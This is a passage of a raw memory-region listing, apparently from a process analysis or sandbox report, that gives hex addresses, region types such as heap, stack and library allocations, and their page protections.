heap
page read and write
189C6433000
heap
page read and write
1D43EF36000
trusted library allocation
page read and write
16DF7C000
stack
page read and write
189C5F00000
heap
page read and write
189C6502000
heap
page read and write
FDD000
trusted library allocation
page execute and read and write
189C5F29000
heap
page read and write
189C5F2A000
heap
page read and write
7FF888080000
trusted library allocation
page read and write
7FF887FDD000
trusted library allocation
page read and write
1660000
heap
page read and write
2FE0000
heap
page read and write
15E0000
heap
page read and write
1E0EC84E000
heap
page read and write
7FF887FF6000
trusted library allocation
page read and write
189C5F56000
heap
page read and write
7FF887E43000
trusted library allocation
page read and write
B73000
unkown
page readonly
1D4591F8000
heap
page read and write
1C390000
heap
page read and write
1B747000
heap
page read and write
FCD000
trusted library allocation
page execute and read and write
7FF88831A000
trusted library allocation
page read and write
7FF8880D5000
trusted library allocation
page read and write
1E0E728F000
heap
page read and write
7FF888312000
trusted library allocation
page read and write
B71000
unkown
page write copy
1D45AFAA000
heap
page read and write
7FF888160000
trusted library allocation
page read and write
1E0E8040000
trusted library allocation
page read and write
1E0EC7C0000
trusted library allocation
page read and write
189C5F57000
heap
page read and write
1D4591E6000
heap
page read and write
1B763000
heap
page read and write
1E0E7200000
heap
page read and write
B6B000
unkown
page readonly
7FF887E04000
trusted library allocation
page read and write
7FF888390000
trusted library allocation
page read and write
189C5F32000
heap
page read and write
1D459215000
heap
page read and write
93D000
stack
page read and write
131A1000
trusted library allocation
page read and write
7FF887E5C000
trusted library allocation
page execute and read and write
1D45AFD4000
heap
page read and write
7FF887E4D000
trusted library allocation
page execute and read and write
B63937E000
unkown
page readonly
9D0000
heap
page read and write
1462000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
B71000
unkown
page read and write
189C6370000
remote allocation
page read and write
B63957E000
stack
page read and write
1E0E7291000
heap
page read and write
7FF887E33000
trusted library allocation
page execute and read and write
7FF888220000
trusted library allocation
page read and write
189C5F52000
heap
page read and write
1BE71000
heap
page read and write
B63A5FE000
stack
page read and write
B99000
heap
page read and write
839F9F9000
stack
page read and write
1D4591CC000
heap
page read and write
7FF887F16000
trusted library allocation
page execute and read and write
7FF88801B000
trusted library allocation
page read and write
141F000
heap
page read and write
7FF887FF0000
trusted library allocation
page read and write
1D4591F1000
heap
page read and write
B50000
heap
page read and write
16DD7E000
unkown
page readonly
7FF887FE0000
trusted library allocation
page read and write
1B6A9000
heap
page read and write
167A000
trusted library allocation
page execute and read and write
7FF887E10000
trusted library allocation
page read and write
B63967E000
unkown
page readonly
7FF888314000
trusted library allocation
page read and write
1D45919B000
heap
page read and write
7FF887FE0000
trusted library allocation
page read and write
1E0E8280000
trusted library allocation
page read and write
1D43F23F000
trusted library allocation
page read and write
7FF887FD7000
trusted library allocation
page read and write
116C000
heap
page read and write
1D4573B0000
heap
page execute and read and write
7FF888000000
trusted library allocation
page read and write
131AE000
trusted library allocation
page read and write
1D45AFC6000
heap
page read and write
16D87B000
stack
page read and write
FB0000
heap
page read and write
7FF888057000
trusted library allocation
page read and write
7FF8882E0000
trusted library allocation
page read and write
1E0ECB60000
remote allocation
page read and write
1D43CF18000
heap
page read and write
2EDE000
stack
page read and write
B63927E000
unkown
page readonly
1E0ECB10000
trusted library allocation
page read and write
B638F7E000
unkown
page readonly
189C64A3000
heap
page read and write
1982000
trusted library allocation
page read and write
7FF888050000
trusted library allocation
page read and write
7FF887E24000
trusted library allocation
page read and write
1E0EC7A0000
trusted library allocation
page read and write
1D457395000
heap
page read and write
7FF887E34000
trusted library allocation
page read and write
3DA0000
trusted library allocation
page read and write
1D44EE36000
trusted library allocation
page read and write
428E000
stack
page read and write
1E0E7213000
heap
page read and write
1E0EC8F7000
heap
page read and write
FD7000
trusted library allocation
page read and write
7FF887FA5000
trusted library allocation
page read and write
2BAE000
stack
page read and write
3BF0000
trusted library allocation
page read and write
1D43EB40000
heap
page read and write
AB0000
heap
page read and write
FD0000
heap
page read and write
5280000
heap
page read and write
3080000
trusted library section
page readonly
189C6469000
heap
page read and write
112B000
heap
page read and write
7FF8880C9000
trusted library allocation
page read and write
1477000
trusted library allocation
page execute and read and write
7FF887E02000
trusted library allocation
page read and write
386E000
stack
page read and write
1210000
heap
page read and write
2E3B000
trusted library allocation
page execute and read and write
1E0E8390000
trusted library section
page readonly
1D43CEF0000
heap
page read and write
189C6487000
heap
page read and write
4410000
trusted library allocation
page read and write
1E0EC81F000
heap
page read and write
189C5644000
heap
page read and write
189C5F30000
heap
page read and write
7FF887FF0000
trusted library allocation
page read and write
1178000
heap
page read and write
1E0ED000000
heap
page read and write
14DE000
stack
page read and write
15C0000
trusted library allocation
page execute and read and write
189C5670000
heap
page read and write
7FF887E13000
trusted library allocation
page read and write
2781000
trusted library allocation
page read and write
1B72D000
stack
page read and write
1E0EC841000
heap
page read and write
189C56FC000
heap
page read and write
1AE5000
trusted library allocation
page read and write
16D67C000
stack
page read and write
7FF887E5B000
trusted library allocation
page execute and read and write
10AA000
heap
page read and write
1D4591D6000
heap
page read and write
1B76F000
heap
page read and write
1D45AF05000
heap
page read and write
B639D79000
stack
page read and write
19A4000
trusted library allocation
page read and write
189C5F13000
heap
page read and write
189C5F29000
heap
page read and write
12E3000
heap
page read and write
1630000
trusted library allocation
page read and write
189C6478000
heap
page read and write
1643000
trusted library allocation
page execute and read and write
7FF888310000
trusted library allocation
page read and write
189C64A5000
heap
page read and write
1E0E727D000
heap
page read and write
A9D000
heap
page read and write
189C6476000
heap
page read and write
3C00000
trusted library allocation
page read and write
FC3000
trusted library allocation
page execute and read and write
1D43F1B5000
trusted library allocation
page read and write
1E0E8370000
trusted library section
page readonly
1D43EDC2000
trusted library allocation
page read and write
3050000
trusted library allocation
page read and write
12F1000
stack
page read and write
189C565E000
heap
page read and write
B6390FE000
stack
page read and write
10A0000
heap
page read and write
7FF887EBC000
trusted library allocation
page execute and read and write
12C0000
heap
page read and write
7FF888200000
trusted library allocation
page read and write
7FF888036000
trusted library allocation
page read and write
189C572C000
heap
page read and write
189C56B7000
heap
page read and write
A60000
heap
page read and write
2BEE000
stack
page read and write
1640000
trusted library allocation
page read and write
B63887E000
stack
page read and write
189C5F54000
heap
page read and write
189C6445000
heap
page read and write
1475000
trusted library allocation
page execute and read and write
1D43F189000
trusted library allocation
page read and write
7FF887EB0000
trusted library allocation
page read and write
1E0EC8E1000
heap
page read and write
2726AE00000
heap
page read and write
1E0EC8E5000
heap
page read and write
1D44ED46000
trusted library allocation
page read and write
FC0000
heap
page read and write
189C56EF000
heap
page read and write
10C4000
heap
page read and write
A66000
heap
page read and write
1D43EF20000
trusted library allocation
page read and write
8FC000
stack
page read and write
189C6400000
heap
page read and write
7FF88833E000
trusted library allocation
page read and write
1E0E7B02000
heap
page read and write
189C5F52000
heap
page read and write
B80000
heap
page read and write
C7E000
stack
page read and write
189C56C8000
heap
page read and write
3BCE000
trusted library allocation
page read and write
1D459273000
heap
page read and write
1E0EC8FB000
heap
page read and write
B638D7E000
unkown
page readonly
2726AB02000
trusted library allocation
page read and write
7FF887EEC000
trusted library allocation
page execute and read and write
7FF887F20000
trusted library allocation
page execute and read and write
1D43F26F000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
1C82A000
heap
page read and write
189C5F32000
heap
page read and write
189C5713000
heap
page read and write
7FF888020000
trusted library allocation
page read and write
189C5F55000
heap
page read and write
1D4591A0000
heap
page read and write
16D47C000
stack
page read and write
7FF888170000
trusted library allocation
page read and write
165D000
trusted library allocation
page execute and read and write
3DEE000
stack
page read and write
7FF888010000
trusted library allocation
page execute and read and write
55E0000
heap
page read and write
189C56A9000
heap
page read and write
7FF887EE6000
trusted library allocation
page read and write
1D43D220000
heap
page read and write
1B6E9000
heap
page read and write
189C64CE000
heap
page read and write
1D44EC62000
trusted library allocation
page read and write
1E0EC7C0000
trusted library allocation
page read and write
1E0ECAA0000
trusted library allocation
page read and write
4440000
trusted library allocation
page read and write
189C6495000
heap
page read and write
1D44ED4C000
trusted library allocation
page read and write
7FF887F50000
trusted library allocation
page execute and read and write
7FF887FD0000
trusted library allocation
page read and write
7FF887E3D000
trusted library allocation
page execute and read and write
3523000
trusted library allocation
page read and write
1E0EC7F0000
trusted library allocation
page read and write
1D44EC04000
trusted library allocation
page read and write
189C5F5D000
heap
page read and write
7FF888363000
trusted library allocation
page read and write
1E0ECB00000
trusted library allocation
page read and write
FF6000
unkown
page readonly
1460000
trusted library allocation
page read and write
1E0E7296000
heap
page read and write
1D45AF5B000
heap
page read and write
1D43EC00000
trusted library allocation
page read and write
2FE0000
unkown
page readonly
7FF888025000
trusted library allocation
page read and write
7FF88806E000
trusted library allocation
page read and write
1172000
heap
page read and write
1D43F166000
trusted library allocation
page read and write
7FF888260000
trusted library allocation
page execute and read and write
40F1000
trusted library allocation
page read and write
55E2000
unkown
page readonly
13CF000
stack
page read and write
1E0ECB60000
remote allocation
page read and write
7FF888100000
trusted library allocation
page read and write
DDC000
stack
page read and write
2DA0000
heap
page execute and read and write
1D457301000
heap
page read and write
2726AE02000
heap
page read and write
B63877E000
unkown
page readonly
10BF000
stack
page read and write
1D43ED68000
trusted library allocation
page read and write
189C5F30000
heap
page read and write
1E0ECAF0000
trusted library allocation
page read and write
7FF887E50000
trusted library allocation
page read and write
1BE80000
heap
page read and write
45D0000
heap
page read and write
1BE4D000
heap
page read and write
7FF887E40000
trusted library allocation
page read and write
189C5680000
heap
page read and write
189C647F000
heap
page read and write
10FD000
stack
page read and write
189C5E00000
heap
page read and write
1BCAE000
stack
page read and write
1BE6B000
heap
page read and write
2E37000
trusted library allocation
page execute and read and write
189C5F5A000
heap
page read and write
1C3B0000
heap
page read and write
189C5F32000
heap
page read and write
14DE000
stack
page read and write
1D43EBED000
trusted library allocation
page read and write
1650000
trusted library allocation
page read and write
1E0ECA00000
trusted library allocation
page read and write
1470000
trusted library allocation
page read and write
A30000
unkown
page readonly
19A6000
trusted library allocation
page read and write
1E0EC800000
heap
page read and write
7FF888340000
trusted library allocation
page read and write
189C5DB0000
remote allocation
page read and write
7FF887FE9000
trusted library allocation
page read and write
1E0E83B0000
trusted library section
page readonly
189C5560000
heap
page read and write
16D37E000
unkown
page readonly
1D43CF36000
heap
page read and write
1E0EC7D0000
trusted library allocation
page read and write
189C56AD000
heap
page read and write
1E0E7329000
heap
page read and write
131B0000
trusted library allocation
page read and write
1E0EC8CE000
heap
page read and write
7FF88800C000
trusted library allocation
page read and write
1BB6E000
stack
page read and write
189C5F55000
heap
page read and write
1D43EB60000
heap
page read and write
325F000
trusted library allocation
page read and write
7FF887E20000
trusted library allocation
page read and write
1E0E8730000
trusted library allocation
page read and write
189C646E000
heap
page read and write
189C573B000
heap
page read and write
1D44ED43000
trusted library allocation
page read and write
305E000
stack
page read and write
7FF887E20000
trusted library allocation
page read and write
189C645F000
heap
page read and write
2726AA13000
unkown
page read and write
1B6A4000
heap
page read and write
B61000
unkown
page execute read
2E35000
trusted library allocation
page execute and read and write
7FF888000000
trusted library allocation
page read and write
1406000
heap
page read and write
1C7F0000
heap
page read and write
7FF88831C000
trusted library allocation
page read and write
189C643D000
heap
page read and write
1620000
trusted library allocation
page read and write
7FF887E4B000
trusted library allocation
page execute and read and write
16DA7E000
stack
page read and write
1194000
heap
page read and write
F9E000
stack
page read and write
4400000
trusted library allocation
page execute and read and write
1466000
trusted library allocation
page execute and read and write
1B90F000
stack
page read and write
1E0E7240000
heap
page read and write
1B72B000
heap
page read and write
1E0E7313000
heap
page read and write
1D43E9D7000
heap
page read and write
F50000
heap
page read and write
1E0ECA00000
trusted library allocation
page read and write
5550000
trusted library allocation
page read and write
10CF000
heap
page read and write
7FF887E30000
trusted library allocation
page read and write
10AD000
heap
page read and write
1BE26000
heap
page read and write
98324FE000
stack
page read and write
16DC7B000
stack
page read and write
7FF8881A0000
trusted library allocation
page read and write
3BFB000
trusted library allocation
page read and write
1E0E8701000
trusted library allocation
page read and write
13EF000
stack
page read and write
189C5F59000
heap
page read and write
1AEC000
trusted library allocation
page read and write
1E0E7274000
heap
page read and write
3BD1000
trusted library allocation
page read and write
B638FFE000
stack
page read and write
16C9FB000
stack
page read and write
FC4000
trusted library allocation
page read and write
3023000
heap
page execute and read and write
1D45AFB4000
heap
page read and write
1490000
trusted library allocation
page read and write
189C640F000
heap
page read and write
1D45924E000
heap
page read and write
2E30000
trusted library allocation
page read and write
189C5702000
heap
page read and write
189C56A4000
heap
page read and write
7FF887E3D000
trusted library allocation
page execute and read and write
4460000
trusted library allocation
page read and write
13E0000
heap
page read and write
51EE000
stack
page read and write
1D457854000
heap
page read and write
1D456B70000
trusted library allocation
page read and write
189C6448000
heap
page read and write
189C5460000
heap
page read and write
125E000
heap
page read and write
1D43EAE0000
heap
page execute and read and write
1BD62000
unkown
page readonly
1BC6E000
stack
page read and write
189C5F56000
heap
page read and write
189C5F52000
heap
page read and write
1D44ED40000
trusted library allocation
page read and write
189C64B6000
heap
page read and write
980000
heap
page read and write
1E0E74E0000
heap
page read and write
141D000
heap
page read and write
5B0000
heap
page read and write
B638E7B000
stack
page read and write
16D17E000
unkown
page readonly
FB0000
trusted library allocation
page read and write
1D43EDB6000
trusted library allocation
page read and write
1161000
heap
page read and write
1D43CEC0000
heap
page read and write
1E0EC740000
trusted library allocation
page read and write
1672000
trusted library allocation
page read and write
189C5DD0000
remote allocation
page read and write
1E0E727B000
heap
page read and write
1D43EDD7000
trusted library allocation
page read and write
1650000
heap
page read and write
7FF888040000
trusted library allocation
page read and write
1E0EC8F2000
heap
page read and write
2726AA02000
unkown
page read and write
55F0000
trusted library allocation
page read and write
1660000
heap
page read and write
1E0E72A0000
heap
page read and write
AC8000
heap
page read and write
1D457330000
heap
page read and write
7FF887E2D000
trusted library allocation
page execute and read and write
7FF888090000
trusted library allocation
page read and write
FE1000
unkown
page execute read
7FF888000000
trusted library allocation
page read and write
1D459221000
heap
page read and write
7FF888080000
trusted library allocation
page read and write
1D457859000
heap
page read and write
7FF887FD0000
trusted library allocation
page read and write
7FF888027000
trusted library allocation
page read and write
16D278000
stack
page read and write
7FF887E03000
trusted library allocation
page execute and read and write
A32000
unkown
page readonly
1D45786F000
heap
page read and write
7FF888010000
trusted library allocation
page read and write
1C800000
heap
page read and write
B639A7E000
stack
page read and write
1E0E7A00000
heap
page read and write
189C6483000
heap
page read and write
189C5F35000
heap
page read and write
1640000
trusted library allocation
page read and write
1D4591B5000
heap
page read and write
1C7DD000
stack
page read and write
1D45788B000
heap
page read and write
7FF8881CA000
trusted library allocation
page read and write
189C5F34000
heap
page read and write
189C5DD0000
remote allocation
page read and write
B63A67E000
unkown
page readonly
1E0E7B1A000
heap
page read and write
5532000
unkown
page readonly
1BE00000
heap
page read and write
1630000
trusted library allocation
page read and write
1BD60000
unkown
page readonly
B60000
heap
page read and write
189C5F5D000
heap
page read and write
2F5E000
stack
page read and write
1D43EAF0000
heap
page execute and read and write
3D00000
trusted library allocation
page read and write
189C5F40000
heap
page read and write
1280000
heap
page read and write
2771000
trusted library allocation
page read and write
189C5F67000
heap
page read and write
3CF0000
trusted library allocation
page execute and read and write
12DBD000
trusted library allocation
page read and write
189C573B000
heap
page read and write
1D43D120000
trusted library allocation
page read and write
189C64C6000
heap
page read and write
1914000
trusted library allocation
page read and write
189C562B000
heap
page read and write
9831DFE000
stack
page read and write
1B6B8000
heap
page read and write
2726AB15000
trusted library allocation
page read and write
7FF8881B6000
trusted library allocation
page read and write
7FF888070000
trusted library allocation
page read and write
1E0E7B1A000
heap
page read and write
1D44EB71000
trusted library allocation
page read and write
1D457660000
heap
page read and write
5BDE000
stack
page read and write
9831BFE000
stack
page read and write
7FF888050000
trusted library allocation
page read and write
189C5702000
heap
page read and write
1BE78000
heap
page read and write
7FF888380000
trusted library allocation
page read and write
31A1000
trusted library allocation
page read and write
1D4573B3000
heap
page execute and read and write
1E0EC85A000
heap
page read and write
B60000
unkown
page readonly
7FF888300000
trusted library allocation
page execute and read and write
7FF887EE0000
trusted library allocation
page execute and read and write
1D45915E000
heap
page read and write
1E0E72A7000
heap
page read and write
1D43CF7A000
heap
page read and write
1E0EC80F000
heap
page read and write
7FF8880A3000
trusted library allocation
page read and write
189C64BE000
heap
page read and write
3E40000
unkown
page readonly
1D43CF4C000
heap
page read and write
1E0E722B000
heap
page read and write
123E000
stack
page read and write
1D4591DC000
heap
page read and write
1D43D0C0000
heap
page read and write
1D43CE90000
heap
page read and write
4430000
trusted library allocation
page read and write
121B000
heap
page read and write
189C572B000
heap
page read and write
98318F3000
stack
page read and write
1D4589FC000
heap
page read and write
3020000
heap
page execute and read and write
189C6481000
heap
page read and write
319E000
stack
page read and write
1D45918A000
heap
page read and write
2E32000
trusted library allocation
page read and write
1D456BA0000
trusted library allocation
page read and write
7FF8881F0000
trusted library allocation
page read and write
B638677000
stack
page read and write
2E50000
trusted library allocation
page read and write
189C5480000
heap
page read and write
2726A940000
heap
page read and write
2726AA39000
heap
page read and write
1D4591D4000
heap
page read and write
7FF888330000
trusted library allocation
page read and write
2E9E000
stack
page read and write
1E0E8360000
trusted library section
page readonly
189C5F02000
heap
page read and write
1D43EB3F000
trusted library section
page readonly
1D43EBF8000
trusted library allocation
page read and write
1E0EC8E0000
heap
page read and write
30EE000
stack
page read and write
FED000
unkown
page readonly
1E0E7970000
trusted library allocation
page read and write
56B000
stack
page read and write
98320FD000
stack
page read and write
12A2000
unkown
page readonly
1463000
heap
page read and write
418E000
stack
page read and write
1680000
heap
page read and write
15D0000
heap
page execute and read and write
43D0000
trusted library allocation
page read and write
5490000
trusted library allocation
page read and write
189C6500000
heap
page read and write
3631000
trusted library allocation
page read and write
1D43EB8A000
trusted library allocation
page read and write
2EE0000
trusted library allocation
page execute and read and write
B63947E000
unkown
page readonly
FD0000
trusted library allocation
page read and write
1E0EC7F0000
trusted library allocation
page read and write
98321F4000
stack
page read and write
1D4592E6000
heap
page read and write
1D43D1E0000
heap
page read and write
FE0000
unkown
page readonly
5880000
trusted library allocation
page execute and read and write
1D45AF8A000
heap
page read and write
1E0E7302000
heap
page read and write
7FF887ED6000
trusted library allocation
page read and write
189C5F2B000
heap
page read and write
189C56D3000
heap
page read and write
10D3000
heap
page read and write
1E0EC82C000
heap
page read and write
7FF888350000
trusted library allocation
page read and write
7FF887F06000
trusted library allocation
page execute and read and write
7FF8880A0000
trusted library allocation
page read and write
2726AF13000
heap
page read and write
7FF887FD0000
trusted library allocation
page read and write
189C5F63000
heap
page read and write
1615000
heap
page read and write
1D43D225000
heap
page read and write
B638B7E000
unkown
page readonly
164D000
trusted library allocation
page execute and read and write
9DE000
heap
page read and write
1E0EC861000
heap
page read and write
143B000
heap
page read and write
B73000
unkown
page readonly
7FF8880E0000
trusted library allocation
page read and write
121E000
heap
page read and write
189C5F59000
heap
page read and write
7FF888190000
trusted library allocation
page read and write
1D43D100000
trusted library allocation
page read and write
7FF887E2D000
trusted library allocation
page execute and read and write
9831FFC000
stack
page read and write
5E0000
heap
page read and write
189C5F2E000
heap
page read and write
1D43EBEF000
trusted library allocation
page read and write
3EC0000
trusted library allocation
page read and write
1676000
trusted library allocation
page execute and read and write
151E000
stack
page read and write
B63917E000
unkown
page readonly
1D457882000
heap
page read and write
15BC000
stack
page read and write
A30000
unkown
page readonly
B6391FE000
stack
page read and write
A2B000
heap
page read and write
B639F7C000
stack
page read and write
1B690000
heap
page read and write
7FF887FAC000
trusted library allocation
page read and write
1E0EC883000
heap
page read and write
1B74F000
heap
page read and write
1D459193000
heap
page read and write
7FF888064000
trusted library allocation
page read and write
7FF888140000
trusted library allocation
page read and write
E50000
heap